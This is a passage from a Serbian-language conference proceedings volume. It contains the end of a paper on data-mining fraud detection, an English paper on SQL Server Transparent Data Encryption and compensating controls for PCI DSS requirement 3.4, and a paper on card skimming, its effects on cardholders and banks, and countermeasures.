Prevare se dešavaju i u zdravstvu, a vezane su za korišćenje zdravstvenog osiguranja. Liu i Vasarhelyi razlikuju tri pristupa pri otkrivanju njegovog nelegalnog korišćenja: sa nadzorom, bez nadzora i hibridni pristup [14]. Ukoliko su istorijski podaci o prevarama raspoloživi i obeleženi, moguće je primeniti prvi pristup, a kao tehnike koristiti veštačke neuronske mreže ili stabla odlučivanja. Ako se ne raspolaže tim istorijskim podacima, onda se primenjuje drugi pristup, a kao tehnika se npr. može koristiti klasterovanje. Hibridni pristup najčešće podrazumeva da se učenje bez nadzora koristi za poboljšanje modela razvijenih primenom učenja sa nadzorom (op.cit.). Dakle, i ovde je situacija slična kao sa kreditnim karticama i telekomunikacionim uslugama.


77

Često nije dovoljno koristiti samo jednu tehniku data mining-a. Kombinacija više njih može dovesti do još boljih rezultata pri otkrivanju prevara. Na žalost, mali broj razvijenih rešenja je publikovan, što iz razloga što se radi o poverljivim podacima, što iz bezbedonosnih razloga.

5. ZAKLJUČAK

Prevare su, na žalost, danas veliki problem mnogih kompanija: banaka, telekomunikacionih kompanija, osiguravajućih društava itd. I sve one moraju da nađu načine da razlikuju legitimne aktivnosti od onih koje predstavljaju prevaru. Drugopomenute je važno otkriti ne samo iz razloga što same po sebi dovode do ogromnih novčanih gubitaka, već i stoga što prevencija ovakvog ponašanja jača poverenje klijenata u kompaniju.

Zbog toga je pitanje razvoja sistema za otkrivanje prevara izuzetno važno i aktuelno. Kako su prevare postale sve sofisticiranije, potrebno je iznalaziti i sve bolje načine njihove detekcije. Za tu svrhu se mogu koristiti različite data mining tehnike, opisane u ovom radu. Prezentovani primeri njihove implementacije u praksi najbolje svedoče kako je moguće uspešno i brzo otkriti sve sumnjive transakcije. Naravno, uvek ima mesta za unapređenje: moguće je uvoditi nove varijable, menjati parametre u modelu, a važno je i uključivati nove slogove u data mining bazu. A, kao što je pomenuto, moguće je i kombinovati više algoritama i na taj način pospešiti procenat uspešnosti detekcije.


78

LITERATURA

[1] Stanišić M. (n.d.) Tehnike i metode interne revizije u sprečavanju, otkrivanju i istrazi prevara, http://predmet.sinergija.edu.ba/pluginfile.php/2412/mod_folder/content/2/ X%20NEDELJA/TEHNIKE%20SPRECAVANJA%20I%20OTKRIVANJA%20PREVARA.pdf?forcedownload=1. (preuzeto marta 2015.)

[2] PwC (2014) PwC Survey Finds Economic Crime Rising Globally, All Business Sectors, Regions Suffer from Impact, www.pwc.lu/en/press-releases/2014/2014-global-economic-crime-survey-en.jhtml (preuzeto marta 2015.)

[3] Sahin Y., Duman E. (2011) Detecting Credit Card Fraud by Decision Trees and Support Vector Machines, Proceedings of the International MultiConference of Engineers and Computer Scientists 2011 Vol I, IMECS 2011, March 16-18, 2011, Hong Kong

[4] Han J., Kamber M., Pei J. (2011) Data Mining: Concepts and Techniques, Third Edition, Morgan Elsevier Inc., Waltham

[5] Turban E., Sharda R., Aronson J. E., King D. (2008) Business Intelligence: A Managerial Approach, Pearson/Prentice Hall, New Jersey

[6] Devedžić V. (2000) Inteligentni informacioni sistemi, Digit i Fakultet organizacionih nauka, Beograd

[7] Ćirić B. (2006) Poslovna inteligencija, Data Status, Beograd [8] Turban E. (1995) Decision Support and Expert Systems: Management Support, Fourth

Edition, Prentice Hall, Englewood Cliffs [9] Ilić V. (n.d.) Neuronske mreže, http://solair.eunet.rs/~ilicv/neuro.html (preuzeto marta 2015.) [10] Institut Rudjer Bošković (2001) Metode segmentiranja podataka,

http://dms.irb.hr/tutorial/hr_tut_clustering_short.php (preuzeto marta 2015.) [11] Akhilomen K. (2013) Data Mining Application for Cyber Credit-card Fraud Detection

System, Proceedings of the World Congress on Engineering 2013 Vol III, WCE 2013, July 3 - 5, 2013, London, UK

[12] SAS Institute (1999) Using Data Mining Techniques for Fraud Detection, www.ag.unr.edu/gf/dm/dmfraud.pdf (preuzeto marta 2015.)

[13] Weiss G. (2009) Data Mining in the Telecommunications Industry, http://www.researchgate.net/profile/Gary_Weiss/publication/251741570_Data_Mining_in_the_Telecommunications_Industry/links/0deec52a00fc4e0dc7000000.pdf (preuzeto marta 2015.)

[14] Liu Q., Vasarhelyi M. (2013) Healthcare fraud detection: A survey and a clustering model incorporating Geo-location information, 29th World Continuous Auditing and Reporting Symposium (29wcars), November 21-22, 2013, Brisbane, Australia

79

IMPLEMENTATION OF TRANSPARENT DATA ENCRYPTION (TDE) AND ADDITIONAL

COMPENSATIONAL CONTROLS AS ALTERTATIVE METHOD REGARDING ENCRYPTION OF PAN NUMBERS IN MICROSOFT SQL DATABASE

(PCI DSS V3.0, SECTION 3.4)

Author: MSc EE, C|EH, Certified Lead ISO27001:2013 Auditor, Darko Mihajlovski,15

1st

Co-author: MSc PM, Kiril Buhov,16 2

nd

Co-author: MSc.B, Jani Nikolov,17

Abstract: “Proper” TDE implementation should cover the 3.4 requirement from PCIDSS v3, where it demands the following: Render PAN unreadable anywhere it is stored (including on portable digital media, backup media, and in logs) by using any of the following approaches: One-way hashes based on strong cryptography (hash must be of the entire PAN) Truncation (hashing cannot be used to replace the truncated segment of PAN)

− Index tokens and pads (pads must be securely stored) − Strong cryptography with associated key-management processes and procedures

Key words: Encryption, Personal Account Number - PAN, Database, PCI DSS, Controls

1. INTRODUCTION

It has come to Visa’s attention that certain assessors and merchants require clarifica- tion about the intent of 3.4 PCI DSS requirements. PCI Requirement 3.4 states: Render sensitive cardholder data unreadable anywhere it is stored (including data on portable media, in logs and data received from or stored by wireless networks) by using any of the following approaches:

− One-way hashes (hashed indexes) such as SHA -1 − Truncation − Index tokens and PADs, with the PADs being securely stored − Strong cryptography, such as Triple-DES 128-bit or AES 256-bit with associated

key management processes and procedures.

15 Head of Information Security Department, Halkbank AD Skopje, [email protected] 16 Head of Information Systems and Technical Support Department, Halkbank AD Skopje, [email protected] 17 Head of Card Processing and Alternative Channels Department, Halkbank AD Skopje, [email protected]

Implementation of transparent data encryption (TDE) and additional compensational controls as altertative method regarding

encryption of pan numbers in microsoft SQL database Zbornik radova Darko Mihajlovski; Kiril Buhov; Jani Nikolov

80

The MINIMUM account information that needs to be rendered unreadable is the payment card account number.

The use of encryption to render cardholder data unreadable is a highly effective and readily accepted way to security data. For companies that are unable to employ sufficient encryption solutions due to technical constraints, compensating controls may be considered. Only companies that have undertaken a risk analysis and have legitimate technological or business constraints will be considered for use of compensating controls to achieve compliance. Compensating controls must provide additional protection to mitigate any additional risk posed by the unencrypted data. Compensating controls considered must be in addition to controls required in the PCI DSS. It is not a compensating control to simply be in compliance with other PCI requirements. Encryption, while a desirable approach, is not the only approach to meeting PCI 3.4.

The problem occurs when the System/Application/Software Vendor tells You that encrypting the PANs is not a possible option.

2. PCI AND THE ART OF THE COMPENSATING CONTROL

Compensating controls are a standard part of any security posture. But what makes an effective compensating control?

In the early years of the Payment Card Industry Data Security Standard (PCI DSS), and even one author's experience under the CISP program, the term compensating control was used to describe everything from a legitimate work-around for a security challenge to a shortcut to compliance. If you are considering a compensating control, you must perform a risk analysis and have a legitimate technological or documented business constraint before you even go to the next step. Companies being assessed will present more documented business constraints for review based on the current economic situation.

Every compensating control must meet four criteria before it can be considered for validity. The four items that every compensating control must do are: meet the intent and rigor of the original PCI DSS requirement, provide a similar level of defense as the original PCI DSS requirement, be "above and beyond" other PCI DSS requirements, and be commensurate with the additional risk imposed by not adhering to the PCI DSS requirement.

An example of a valid control might be using extra logs for the su command in UNIX to track actions executed under a shared root password. In rare cases, a system may not be able to use something like sudo to prevent shared administrator passwords from being used. Keep in mind, this is not a license to use shared passwords everywhere in your environment. Nearly every system has the ability to use something like sudo, or "Run As" which is free or built into your OS, or a commercial variant if your platform requires this.

2.1. WHERE ARE COMPENSATING CONTROLS IN PCI DSS?

Compensating controls are not specifically defined inside PCI, but are instead defined by you (as a self certifying merchant) or your QSA. That's where the trouble starts.

Thankfully, the PCI Council provides an example of a completed compensating control in Appendix C of the PCI DSS, as well as a blank template to fill out. Appendix B provides all the guidance they feel necessary in order to design a compensating control.



81

Compensating controls are ultimately accepted by acquirers or the card brands themselves (if applicable), so even after putting all of this information together you could face the rejection of your control and a significant amount of expense re-architecting your process to fit the original control. This is where an experienced QSA can really help you ensure your control passes the "Sniff Test." If it smells like a valid control, it probably will pass. If you need examples, look later in this chapter under the section titled "Funny Controls You Didn't Design."

2.2. WHAT A COMPENSATING CONTROL IS NOT

Compensating controls are not a short cut to compliance. In reality, most compensating controls are actually harder to do and cost more money in the long run than actually fixing or addressing the original issue or vulnerability.

Imagine walking into a meeting with a customer that has an open, flat network, with no encryption anywhere to be found (including on their wireless network which is not segmented either). Keep in mind, network segmentation is not required by PCI, but it does make compliance easier. Usually in this situation, assessors may find a legacy system that cannot be patched or upgraded, but now becomes in scope. Then the conversation about compensating controls starts. Now imagine someone in internal assessing telling you not to worry because they would just get some compensating controls. Finally, imagine they tell you this in the same voice and tone as if they were going down to the local drug store to pick up a case of compensating controls on aisle five.

Compensating controls were never meant to be a permanent solution for a compliance gap. Encryption requirements on large systems were made unreasonable early in this decade. Not only was there limited availability of commercial off-the-shelf software, but it was prohibitively expensive to implement. For Requirement 3.4 (Render PAN, at minimum, unreadable anywhere it is stored), card brands (largely Visa at the time) were quick to point out that compensating controls could be implemented for this requirement; one of those being strong access controls on large systems.

For mainframes, assessors would typically do a cursory walk through the controls and continue to recommend an encryption solution at some point for those systems. At one point, compensating controls were deemed to have a lifespan; meaning that the lack of encryption on a mainframe would only be accepted for a certain period of time. After that, companies would need to put encryption strategies in place.

Compensating control life spans never materialized. Compensating controls can be used for nearly every single requirement in the DSS--the most notable exception being permissible storage of sensitive authentication data after authorization. There are many requirements that commonly show up on compensating control worksheets; Requirement 3.4 being one of them.

To clarify: it is up to the QSA performing the assessment to decide to accept the control initially, but the Acquiring Bank (for merchants) has the final say. Substantial documentation and an open channel of communication to your acquirer is essential to ensure money is not wasted putting together controls that ultimately do not pass muster.

Still, compensating controls are still a viable path to compliance even considering the above caveats and descriptions of why you may not want to use them.



82

2.3. HOW TO CREATE GOOD COMPENSATING CONTROL

We've spent quite a bit of time setting this section up. We talked about what Compe- nsating Controls are, what they are not, and some of the best mis-guided attempts to create them. Before we discuss the examples, please remember that these examples should be used for illustrative purposes only. I have over simplified the scenarios for brevity, and things are rarely this simple in the corporate world. Ultimately, compensating controls must be approved first by a QSA, or barring that, your Acquiring Bank. I know I don't like it when someone brings an article about PCI to an interview during an assessment, so please don't do that with this one. Now let's walk through a couple of examples of how one might create a good compensating control.

Here's a common compensating control that QSAs will define and implement at a customer. A Level 1 brick and mortar retailer with 2,500 stores has some systems in their stores that do not process cardholder data. These systems are a high risk to this customer's cardholder environment because they may access both the internet through a local firewall and the corporate intranet and webmail system, and users log-in to that machine with the default administrator account. Store managers and retail operations claim that the systems are required for day-to-day business because each store is empowered to customize their operations to better fit the local market. The corporation believes this drives innovation and helps them maintain a competitive edge over their peers.

If the retailer chooses not to segment the network, all of the systems in the store are now in scope, and they must meet all of the applicable requirements of the PCI DSS. Doing this will add significant expense to the IT infrastructure, and will probably force a call center to be staffed up in order to manage the volume of calls that will come in for things like password maintenance.

What do you do? Do you crush the retailers' aspirations to innovate by telling them they must deploy active directory to these machines, lock them down Department of Defense tight, and staff a call center? That is one option. But, if you made that recommendation you missed something important--understanding the business and limiting the impact that your compliance recommendations make. Instead, consider this compensating control.

Any number of network components could be used to create some segmentation in this environment. Let's say that we have a VLAN (Virtual Local Area Network) aware switch at the location that can have access lists (ACLs) tied to it. Why not create a new VLAN for just the POS network? Then create some ACLs around it to make it look like it is segmented behind a firewall. Now the threat of the in-store PC is effectively mitigated provided that the ACLs are appropriately secure.

"But my store networks are different in every store," you say. "I can't just slap something in there like that and expect it to work globally!" If this is the case, is your store support group is overloaded with break-fix calls? Maybe this could be an opportunity to shore this up and make each store based on a consistent footprint?

3. APPROACH TO THE PROBLEM

SQL Server has advanced over the years to become a very popular, capable database, evolving from a primarily departmental and SMB database to a fully enterprise capable



83

platform. SQL Server’s appeals are many, from its highly scalable and secure database engine to its built in reporting and data analysis tools. SQL Server 2008 offers new features of particular interest to PCI DSS compliance including:

− Full Database Encryption through Transparent Data Encryption (TDE) − Split Key Ownership through Extensible Key Management (EKM) − Granular Auditing Capabilities through SQL Server Audit and Change Data Capture − Continued support of Signed Module − Built-in Control over Default SQL Server 2008 Features − Stronger Control and Auditability overServer and Database Configuration − through Policy-Based Managemen Implementation of the PCI DSS controls through SQL Server 2008 technology allo-

ws for the ability to standardize and computerize security controls effectively and efficiently, particularly when applied duringthe installation process.

4. SQL SERVER 2008 TRANSPARENT DATA ENCRYPTION OFFERS FULL DATA ENCRYPTION

“Transparent data encryption(TDE) performs real-time I/O encryption and decryption of the data and log files. The encryption uses a database encryption key (DEK), which is stored in the database boot record for availability during recovery. The DEK is a symmetric key secured by using a certificate stored in the master database of the server or an asymmetric key protected by an EKM module. TDE protects data "at rest", meaning the data and log files. It provides the ability to comply with many laws, regulations, and guidelines established in various industries. This enables software developers to encrypt data by using AES and 3DES encryption algorithms without changing existing applications.”

When choosing to enable TDE in your environment there are a number of factors to consider during the implementation. First, TDE only secures data at rest and does not help to secure the communication (such as during remote ODBC queries) of the data. Second, the certificate used to encrypt the data is required during any attempt to decrypt the data. Third, complete and accurate backups of the certificate are required to minimize the risk of data loss. Backups of the database itself will be encrypted and will require the certificate as well.

4.1. USING MANUAL KEY MANAGEMENT

If you are using manual key management several steps will be required. You will need to create a database master key in the master database (be sure to use a strong password to protect the key). The databasemaster key you have created will be used to protect the TDE certificate. You are now ready to backup the master database master key to a removable disk and store in a safe location.

At this point, you are ready to create a certificate in the master database protected by the database master key. Once again, remember to backup the certificate to a removable disk and store in a safe location. Only users who need access to cardholder data should be given permissions to any keys and certificates used to decrypt sensitive data. As noted above, encryption



84

keys may be managed manually or through an encryption key management software package in SQL Server 2008.

In the case of SQL Server, the TDE Database Encryption Key must be replaced at least once per year. You will need to generate or load a new certificate or asymmetric key, backup the certificate, and re-encrypt the Database Encryption Key using the new certificate. It is important to make sure to keep backups of prior certificates as those will be required to restore copies of the database made when those certificates were active. Keep in mind this is also required when using EKM generated asymmetric keys; however, the EKM provider should have features for managing this.

First, any user that can backup keys and certificates should have write access to the backup folder location, but be denied read access to that location. Second, users with access to the key and certificate backup folders should be denied access to any backups of the database. To make certain that this is the case, the user who backs up the database should not be the same user who backs up the certificates. At a high level, if an organization is using manual key management, the key must be stored utilizing tamper evident media, or in a tamper evident container. In some instances something as simple as a pressure-sealed envelope may su- ffice. The keys must also be placed under dual control. An example of dual control might be a key file an organization has placed in “lockbox” inside of a safe. The key to the lockbox and key to the safe would be given to separate individuals. Thus two people are required to act in concert to recover the key. Lastly, any plaintext instances of cryptographic keys must be under split knowledge. Split knowledge requires that no single individual has access to the entire plaintext key.

Using our “lockbox in a safe” example, split knowledge might require that the actual key is stored in two “halves”, and potentially in separate lockboxes inside the safety deposit box. Looking at what this means for SQL Server when using manual key management first create a database master key in the master database. Be sure to use a strong password to protect the key, with parts of the password entered by two individuals. The database master key you have created will be used to protect the TDE certificate. You are now ready to backup the master database master key and/or the TDE certificate to a removable media. Be certain to store it in a safe location, and employ secure storage mechanisms meeting the requirements of tamper evident, dual knowledge, and split control referenced above. At this point, you are ready to create a certificate in the master database protected by the database master key. Once again, remember to backup the certificate to a removable media and store securely. When using manual key management, careful consideration must be given to access to the data encrypting keys and key encrypting keys so that your organization can achieve proper implementation of split knowledge. For example, it may be required to have two individuals present to enter portions of the password assigned to the backup certificates. A similar requirement may exist for access to service accounts which can access the keys. Remember to carefully consider which users or service accounts that have sufficient access to the database bootfile, as that will be the “key to the kingdom”.

Also, it should be mentioned that in the environment it should be fulfilled the following: − SA disabled when using Windows auth. Mode − BUILTIN/Administrators group not a member of sysadmin role − Use of signed modules − Role based access − Hard segregation of duties, with matrixes of segregations, evidences and etc. − Hardening of the Database configuration, as reference - Compliance with the

Microsoft SQL 2008 Server Hardening Guide, Version 1.0.0, 19 May 2011



85

LITERATURA

[1] Elaine Barker, William Barker, William Burr, William Polk, and Miles Smid, NIST Special Publication 800-57, Recommendation for Key Management – Part 1: General (Revision 3), (2012)

[2] K. Brian Kelley, Kevvie Fowler, Nancy Hidy-Wilson, CIS Microsoft SQL Server 2012 Database Engine Benchmark v1.0.0, Release Date: Mon Jan 6 12:10:34 2014

[3] idera, SQL Server Whitepapper, Security and Compliance Solutions for Payment Card Industry (PCI) Data Security Standard (DSS),

[4] https://msdn.microsoft.com/en-us/library/bb934049.aspx [5] http://msdn.microsoft.com/en-us/library/ms190730%28v=SQL.100%29.aspx

87

SPECIFIČNE VRSTE SAJBER KRIMINALA – – CARD SKIMMING

SPECIAL TYPES OF CYBER CRIME – CARD SKIMMING

Prof. dr Igor Pejović18

Apstrakt: Card skimming je načešći i tehnološki najjednostavniji način krađe podataka sa platne kartice, kao i jedan od načina da se vlasnik kartice finansijski ošteti za značajan iznos sredstava koje ima na kartici. Cilj ovog rada je da opiše kako skimming funkcioniše, kada i kako se koristi, kao i da prikaže kakav efekat ima na korisnika platnih kartica. U radu je prikazan i aspekt izdavaoca platnih kartica, sa osvrtom na finansijske gubitke i načine za sprečavanje skimminga. Interes banaka svakako je da se ova vrsta zloupotreba suzbije kako bi se održao customer care i zadržalo poverenje klijenata u korišćenje kreditnih kartica. Prikazan je značaj saradnje između banaka kao izdavaoca platnih kartica i ministarstva unutrašnjih poslova i pravosuđa, jer njihovom konsolidovanom saradnjom u pravom roku ovaj problem može biti značajno umanjen

Ključne reči: Card skimming, krađa podataka, platne kartice, banke, MUP, pravosuđe

18 Visoka škola za ekonomiju i upravu, Beograd, Imotska 1. Email: [email protected]

Specifične vrste sajber kriminala – Card scriming Zbornik radova Igor Pejović

88

U V O D

ŠTA JE SKIMMING I KAKO FUNKCIONIŠE?

Skimming je izvorno engleska reč i definiše se kao krađa podataka sa platne kartice prilikom njene upotrebe, validne transakcije platnom karticom. Vlasnik kartice prilikom npr podizanja novca sa bankomata, vrši nešto što za njega izgleda kao uobičajena transakcija, a da pri tome nije svestan, vizuelno ili zvučno upozoren da su tom prilikom podaci sa njegove kartice kompromitovani. Važno je napomenuti da su tom prilikom samo kompromitovani podaci, ali da i dalje nije izvršena njihova zloupotreba. Skimming omogućava trećim licima da u narednom periodu, zloupotrebe podatke koje su ovom radnjom preuzeli i oštete vlasnika kartice za novac koji se nalazi na njegovoj kreditnoj kartici bez njegovog znanja.

Postavlja se pitanje kako su podatci sa kreditnih kartica tako ranjivi. Odgovor leži u nedovoljnoj usklađenosti standarda, nedovoljnom tehnološkom razvoju u različitim delovima sveta, ali i želji izdavaoca platne kartice da korisniku pruži fleksibilnost i komoditet u smislu da svoju platnu karticu može koristiti bilo gde u svetu. Iako se bezbednost platnih kartica povećala uvođenjem čipa i pin koda, ono što je slaba tačka zove se magnetna traka, kao neophodan element kartice. Neke zemlje usvojile su kao standard isključivo korišćenje platnih kartica sa čipom, kao jedno od rešenja ove zlupotrebe, ali većina zemalja još nije ostvavivši prostor za ranjivost korišnje ovakvih platnih kartica. Sve dok magnetna traka postoji na platnim karticama, biće moguće jednostavno pročitati podatke koje ona sadrži. Format zapisa podataka na magnetnoj traci je standardizovan i to na sledeći način:

− početni karkater – jedan karakter, najčešće „%“ − kod za formu zapisa - jedan slovni karakter − primarni broj računa – do 19 karaktera. Najčeće, ali ne i uvek ovaj broj odgovara

broju kartice odštampanom na prednjoj strani − separator – jedan karakter, najčešće „^“ − ime i prezime – 2 do 26 karaktera − separator – jedan karakter, najčešće „^“ − datum isteka kartice – četiri karaktera u formatu GGMM − servisni kod – tri karaktera

Slika 1.


89

− diskrecioni podaci – ovo polje može sadržati Indikator za verifikaciju pin koda (PVKI), Pin Verification Value (PVV – četiri karaktera), Card Verification Value ili Card Verification Code (CVV ili CVC, 3 karaktera)

− završni karakter – jedan karakter, naječšće „?“ Ovi podaci nisu ni na koji način šifrovani i moguće ih je pročitati veoma jednosta-

vnim uređajem za čitanje magnetnog zapisa (skimmerom)19 uz jedini preduslov da se platna kartica prevuče preko skimmera. Zloupotreba ovih podataka moguća je na više načina, od kojih je najčešći izrada „kloniranih“ platnih kartica, dakle kartica na kojima će se naći magnetni zapis sa identičnim podacima. Drugi način je zloupotreba preko interneta. Razlika između ova dva načina zloupotrebe je što je za korišćenje klonirane platne kartice uglavnom (ali ne uvek) potrebno imati i PIN kod, a za zloupotrebu, odnosno plaćanje preko interneta, svi su podaci dostupni, uključujući i kontrolni kod (CVC ili CVV)20.

Imajući u vidu da su skimmeri veoma mali uređaji, moguće ih je jednostavno sakriti ili maskirati. Najčešća mesta za postavljanje skimmera su ba- nkomati, ali sve više i POS terminali, kao na primer na sa- mouslužnim benzinskim stanica- ma. Uglavnom se uz skimmer postavlja i mala kamera koja snima unošenje PIN koda, tako da u kombinaciji podataka sa magnetog zapisa i PIN koda platna kartica postaje potpuno kompromitovana21.

Postavljanje skimmera je

relativno jednostavno i uglavnom se radi tako da korisnik bankomata ili POS terminala ne može da uoči ništa neobično. Uz sam skimmer, neophodno je u neposrednoj blizini postaviti i uređaj koji će bežičnom vezom biti povezan sa skimmerom i koji će sve te podatke beležiti i čuvati. Nakon prikupljenog dovo- ljnog broja podataka, oni se prodaju kriminalnim organizacijama ili licima koja na osnovu njih prave klonirane kartice i uglavnom u toku jako kratkog vremenskog perioda

19 pogledaj sliku 1. 20 pogledaj sliku 2. 21 Pogledaj sliku 3.

Slika 3.

Slika 2.


90

(najčešće nekoliko sati) njihovim korišće- njem podižu novac sa bankomata. Bitno je napomenuti da se to podizanje novca skoro uvek dešava u drugim zemljama, a retko u zemlji u kojoj su podaci ukradeni. Po nekim statistikama najčešćih šest zemalja u kojima se podiže novac za sloupotrebljenih kartica su: SAD, Dominikanska republika, Kolumbija, Ruska federacija, Brazil i Meksiko.

Bitno je napomenuti, da kada se uzmu u obzir sve moguće vrste zloupotreba platnih kartica, skimming je u samom vrhu zloupotreba i nosi oko 40% finansijskog gubitka banaka.

Kako skimming funkcioniše možemo videti sledećim šematskim prikazom

SKIMMING SA STANOVIŠTA KORISNIKA

Korisnici platnih kartica najčešće su zaštićeni od gubitka novca tako što banke na sebe preuzimaju rizik i korisniku nadoknađuju štetu koju je pretrpeo preko određenog iznosa štete. U Srbiji većina banaka ne isplaćuje zloupotrebe kartica ispod oko 150 eura u dinarskoj protiv vrednosti, već taj iznos snose korisnici kartice. Nezavisno od materijalane štete, korisnik kartice ipak doživljava stres, određeni vremenski period, od prijave zloupotrebe do perioda kada mu banka ne nadoknadi ili ospori gubitak, korisnik ne može da raspolaže tim no- vcem, već su ta sredstva privremeno blokirana. Korisnik platne kartice uglavnom nakon susreta za zloupotrebom svoje platne kartice, menja svoje navike korišćenja dotadašnjeg kori- šćenja kartice i značajno gubi poverenje u banku ali i u celokupni bankarski sistem. Na osnovu raznih analiza i studija napravljenih u raznim zemljama, korisnici platnih kartica, često čak menjaju svoje navike na osnovu objavljenih vesti o skimming napadima i zloupotrebama u raznim sredstvima javnog informisanja. Analize su pokazale da ukoliko je objavljena vest o skimming napadu na bankomatu, narednog dana raste broj transkacija na POS terminalima i obrnuto. Međutim, promena u navikama je kratkoročnog karaktera i već nakon jednog ili par dana, sve se vraća u normalu.

Kada se vratimo na region i našu zemlju, možemo reći da u Srbiji i dalje ne postoji dovoljno razvijena svest kod korisnika platnih kartica o ovoj vrsti zloupotrebe. Platežna moć stanovništva nije takva da su skimming napadi učestali i platne kartice se ne koriste u dovoljnoj meri. Celokupna ekonomska situacija i razvijenost jedne zemlje, možemo povući paralelu, značajno opredeljuje broj zloupotreba putem skimminga.


91

Zakonodavni okvir u periodu uvođenja platnih kartica u Srbiji štitio je korisnika. Za-

kon o zaštiti korisnika finansijskih usluga je u odeljku 6 – Prava u vezi s platnom karticom, član 38, paragraf 5 glasio je:

„U slučaju da je došlo do neovlašćenog korišćenja platne kartice, odnosno podataka s platne kartice – korisnik je dužan da, odmah posle tog saznanja, a najkasnije u roku od 45 dana od datuma zaduženja, prijavi banci transakciju izvršenu neovlašćenim korišćenjem platne kartice, odnosno podataka s platne kartice, u kom slučaju može snositi gubitke koji su posledica neovlašćenog korišćenja najviše do iznosa od 15.000 dinara”

Ovaj odeljak je predviđen za brisanje iz zakona 1. oktobra 2015. Banke, odnosno izdavaoci platnih kartica su u velikom broju slučajeva ovo ubacile u

ugovor o korišćenju platne kartice, tako da su korisnici i dalje zaštićeni, ali se očekuje veća zaštita banaka i prebacivanje odgovornosti na korisnike platnih kartica u većoj meri.

SKIMMING SA STANOVIŠTA BANAKA

Banke, odnosno finansijske institucije, primarno su fokusirane na proizvode i servise koji prvenstveno donose profit i čine njihovo osnovno poslovanje. Kao takve, banke su svakako spremne da prihvate određeni nivo rizika i zloupotreba kojima su izložene. Troškovi nastali kao zloupotreba platnih kartica kreću se oko 1% troškova, trošak kapitala oko 35%, operacioni troškovi i trošak marketinga oko 35% i trošak otpisa (Charge-off) potraživanja su od oko 28%. Uzimajući u obzir da postoje i drugi vidovi zloupotreba platnih kartica, kao što su krađa informacija iz baza podataka i tome slično (CNP – Card Not Present fraud) koji nose oko 60% problema, dolazimo do zaključka da je trošak banke uzrokovan skimmingom manji od 0.5% ukupnih troškova, što verovatno spada u relativno prihvatljivu meru.


92

Ukupna direktna finansijska šteta na teritoriji Evropske Unije koju banke trpe kao posledicu svih vrsta zloupotreba platnih kartica je na nivou 1.5 milijarde eura na godišnjem nivou sa jako malim devijacijama tokom vremena. U SAD-u je šteta znatno veća i iznosi oko 7.5 milijardi dolara.

Imajući u vidu da je ukupan broj incidenata na bankomatima, uključujući skimming, mehaničke pokušaje, itd. na godišnjem nivou u Evropskoj uniji oko 20.000, kao i to da skimming čini 98% svih pokušaja, dolazi se do sume od 40.000 eura po incidentu.

Načini na koje banke mogu da štite svoje korisnike variraju u kompleksnosti, uspe- šnosti i ceni. Najefektniji način je uklanjanje magnetnog zapisa sa platne kartice. Evropska banka je 2010 godine izdala preporuku da sve platne kartice izdate u Evropskoj uniji imaju samo čip. Prva zemlja koja je to uradila je Belgija, gde je magnetni zapis bez ikakvih podataka. Ovaj vid zaštite, koji se može nazvati i GeoBlocking, korisnika onemogućava da koristi platnu karticu u regionima sveta gde ne postoji verifikacija čipa i PIN koda. Sa sigurnosne tačke gledišta, ovaj vid zaštite izuzetno je efektan jer su skimming napadi skoro u potpunosti onemogućeni.

Iako ovaj vid zaštite smanjuje komoditet korisnika, jer je osnovna predpostavka da se platne kartice prihvataju na globalnom svetskom nivou, a kartice samo sa čipom i dalje nisu postale svetski standard, rezultati anketa pokazuju da preko 60% korisnika podržava ovakvo rešenje, od kojih se 28% opredeljuje da zadrži magnetni zapis na kartici i da kontaktira banku u trenutku kada želi da ga osposobi, i 12% koji želi platnu karticu isključivo sa čipom.

Drugi vid zaštite je postavljanje anti-skimming uređaja na bankomate, što predstavlja trošak od oko 5% od TCO bankomata, a nudi poprilično visok sepen zaštite, ali i konstantno unapređivanje. Ovaj sistem se bazira na uredjaju koji šalje elektromagnetne talase koji skimmer onemogućava da tačno pročita podatke sa magnetnog zapisa. Dolazi do mešanja podataka koje šalje anti-skimming uređaj i onih koji se nalaze na magnetnom zapisu, i skimmer dobija podatke sa magnetnog zapisa pomešane sa šumom i ti podaci su uglavnom neupotrebljivi.


93

ZAKLJUČAK

Jedan od glavnih problema koji se javlja u predmetnoj materiji predstavlja dobra koordinacija službi bezbednosti sa odeljenjima prevara koje su sastavni deo bankarskog sektora. Sve zloupotrebe se promptno prijavljuju nadelžnim organima MUP-a, ali postupak istrage i pronalaženja vršioca ovog krivičnog dela je često dugačak i zavisi od pravosudja koje postupak procesuira. Rešenje je u stalnoj saradnji banaka i MUP-a, kao i obuci, učenju na svakom novom načinu zloupotrebe gde bi se dostupnost informacija obezbedila i ostalim bankama koje još nisu bile meta skimming zloupotreba. Dodatni efekat imali bi stalni seminari gde bi se javno prezentovali novu načini skimming prevara i osavremenio sistem obave- štavanja koji bi preventivno delovao na smanjenje spornih slučaja. Saradnja regiona i EU takođe je krucijalna u sprečavanju ovih zloupotreba. Nemogućnost evropske policije da spreči i istražuje sve što se dešava van granica Evropske unije, svakako predstavlja dodatan problem, jer se podizanje novca vrši u raznim zemljama iako su korisnici platnih kartica iz drugih zemalja. Nedovoljna koordinacija između banaka i policije, delom zbog nedostatka odgovara- jućih regulativa za prijavljivanje krađe podataka iz baza podataka, a delom i zbog urušavanja imidža banke ukoliko informacije o napadu postanu javno dostupne svakako ima prostora za usavršavanje u bližu saradnju. Ovo za posledicu ima da kriminalne organizacije koje se bave prevarama sa platnim karticama dugo mogu da ostanu neotkrivene, a i sama činjenica da se šteta ne menja tokom godina govori tome u prilog. Sa druge strane, postavlja se i pitanje koliko je spomenuta finansijska šteta tačno procenjena i da li je možda mnogo veća. Pored Europola i policija zemalja članica, postoji i posebna organizacija sa nazivom EAST (Euro- pean ATM Security Team) koja se bavi isključivo bezbednošću bankomata.

Imajući u vidu da se broj platnih kartica svakodnevno povećava (trenutno je veći od 800.000.000 na nivou Evrope) i da vrednost legitimnih transakcija prešla 3.000 milijardi eura jasno je da će biti sve više i više pokušaja da se kompromituju i zloupotrebe podaci sa platnih kartica, što znači da je ovo polje kojem je u budućnosti neophodno posvetiti mnogo veću pažnju što se tiče prilagođavanja zakonodavnog okvira, razvijanja svesti kod korisnika i napora banaka za suzbijanjem zloupotreba i boljom koordinacijom sa policijom.


94

Reference:

1. Do newspaper articles on card fraud affect debit card usage, Anneke Kosse, 2011 2. Analysis on Credit Card Fraud Detection Methods, Renu, HCE Sonepat, Suman, 2014 3. Credit card fraud and detection techniques: a review, Linda Delamaire (UK), Hussein Abdou

